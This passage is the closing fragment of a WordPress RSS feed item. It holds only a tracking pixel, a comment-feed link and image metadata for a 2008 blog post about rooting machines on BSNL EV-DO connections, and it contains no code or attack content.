src="http://stats.wordpress.com/b.gif?host=technocrawl.wordpress.com&amp;blog=4571007&amp;post=457&amp;subd=technocrawl&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://technocrawl.wordpress.com/2008/12/02/rooting-machines-that-are-using-bsnl-ev-do/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">technocrawl</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/BSNLEVDO-1.jpg" medium="image">
			<media:title type="html">BSNL EV-DO</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/BSNL.jpg" medium="image">
			<media:title type="html">BSNL Hostnames</media:title>
		</media:content>

		<media:content url="http://i402.photobucket.com/albums/pp101/cybercrawler/connected.jpg" medium="image">
			<media:title type="html">Connected</media:title>
		</media:content>
	</item>
	</channel>
</rss>
